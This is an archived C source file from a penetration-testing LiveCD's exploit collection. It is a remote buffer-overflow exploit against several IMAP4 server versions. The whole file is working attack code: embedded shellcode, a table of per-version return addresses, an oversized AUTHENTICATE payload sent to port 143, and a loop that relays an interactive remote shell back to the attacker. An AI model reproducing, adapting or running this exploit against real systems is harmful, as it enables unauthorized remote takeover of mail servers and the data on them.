home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
mail
/
imapd
/
imapx.c
< prev
next >
Wrap
C/C++ Source or Header
|
2005-02-12
|
4KB
|
181 lines
/* Ultimate IMAP4 sploit coded by The Tekneeq Crew */
/* http://www.attrition.org/hosted/tekneeq */
#include <stdio.h>
#include <stdarg.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define RET_POS 1028
int connect_tcp(struct in_addr addr,unsigned short port);
int fdprintf(int dafd,char *fmt,...);
void RunShell(int thesock);
struct types
{
char *name;
unsigned long ret_addr;
};
struct types types[]=
{
{"IMAP4rev1 9.0",0xbffff6e4
},
{"IMAP4rev1 v10.190",0xbffff30f},
{"IMAP4rev1 v10.223",0xbffff6e4},
{"IMAP4rev1 v10.203",0xbffff30f},
{"IMAP4 Service 8.3",0xbffff724},
{NULL,0}
};
char overflow_buff[4096];
struct in_addr victim;
/* standard shellcode with a few modifications */
char hellcode[]=
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";
int main (int argc,char **argv)
{
unsigned long *ret;
char recvbuf[1024];
int sockfd;
int i,n=0;
if (argc < 2)
{
printf("Usage: %s <hostname> [offset]\n",argv[0]);
exit(0);
}
if (!host_to_ip(argv[1],&victim))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
memset(overflow_buff,0x90,4096);
for (i=RET_POS-(strlen(hellcode));i<RET_POS;i++)
overflow_buff[i]=hellcode[n++];
if ((sockfd=connect_tcp(victim,143)) < 0)
{
fprintf(stderr,"Error connecting to remote host\n");
exit(0);
}
n=read(sockfd,recvbuf,1024);
if (n <= 0)
{
fprintf(stderr,"Connection closed\n");
exit(0);
}
printf("%s\n",recvbuf);
for (i=0;;i++)
{
if (types[i].name==NULL)
{
i=0;
break;
}
if (strstr(recvbuf,types[i].name))
break;
}
printf("Imap type %d\n",i);
ret=(unsigned long *)(overflow_buff+RET_POS);
*ret=types[i].ret_addr;
if (argv[2]) *ret+=(unsigned long)atoi(argv[2]);
overflow_buff[RET_POS+4]=0;
printf("Sending overflow\n");
fdprintf(sockfd,"* AUTHENTICATE {%d}\n",strlen(overflow_buff));
fdprintf(sockfd,"%s\r\n",overflow_buff);
read(sockfd,recvbuf,1024);
printf("Got shell\n");
RunShell(sockfd);
close(sockfd);
return;
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
}
int fdprintf(int dafd,char *fmt,...)
{
char mybuffer[4096];
va_list va;
va_start(va,fmt);
vsnprintf(mybuffer,4096,fmt,va);
write(dafd,mybuffer,strlen(mybuffer));
va_end(va);
return(1);
}
int connect_tcp(struct in_addr addr,unsigned short port)
{
struct sockaddr_in serv;
int thesock,flags;
thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if (connect(thesock,(struct sockaddr *)&serv,sizeof(serv)) < 0)
return(-1);
else
return(thesock);
}
int host_to_ip(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
/* www.hack.co.za [2000]*/
